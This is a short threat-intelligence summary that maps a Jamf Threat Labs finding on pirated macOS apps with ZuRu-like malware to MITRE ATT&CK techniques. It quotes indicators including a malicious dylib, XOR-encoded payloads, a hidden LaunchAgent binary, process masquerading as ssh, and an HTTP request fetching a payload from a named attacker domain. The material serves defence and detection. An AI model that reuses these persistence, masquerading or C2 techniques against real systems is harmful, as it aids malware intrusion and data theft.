Jamf Threat Labs Discovers Pirated macOS Apps Similar to ZuRu Malware

MITRE Techniques

• [T1055] Dynamic-link Library Injection – The malicious dylib libpng.dylib is loaded at runtime by the app to start malware in the background. “an additional dylib library titled libpng.dylib loaded at runtime. This dylib is loaded each time the application is opened thus starting the malware in the background.”
• [T1027] Obfuscated/Compressed Files and Information – Downloaded payloads are XOR-encoded and decoded in memory before execution. “Both of the downloaded executables are encoded with a custom XOR routine and get decoded in-memory before being written to disk.”
• [T1547.001] Boot or Logon Autostart Execution: Launch Agents – The persistent downloader uses a LaunchAgent to run a hidden binary at startup. “The LaunchAgent will ensure the .fseventsd binary persists by executing it at the hidden path /Users/Shared/.fseventsd.”
• [T1059.004] Command and Scripting Interpreter – The malware uses shell/launchctl commands and manipulates process arguments to blend in. “The arguments to represent that of ssh…”; “sudo launchctl procinfo 62127 program path = /private/tmp/.test argument count = 2 argument vector = { [0] = /usr/local/bin/ssh [1] = -n }”
• [T1071.001] Web Protocols – The backdoor communicates with attacker infrastructure via HTTP(S) to fetch payloads. “GET /fs.log HTTP/1.1 HOST: bd.vscode.digital” and similar requests to download payloads.
• [T1036] Masquerading – The malware disguises its persistence artifacts with Apple-like naming (com.apple.fsevents.plist) and other system-like paths. “com.apple.fsevents prefix is an evasion technique… to disguise itself as a legitimate Apple plist.”
• [T1041] Exfiltration Over C2 Channel – ZuRu-like behavior to grab sensitive files and upload them to an attacker server (historical context referenced in ZuRu). “the ZuRu malware … would execute a Python script in the background to grab sensitive files and upload them to an attacker server.”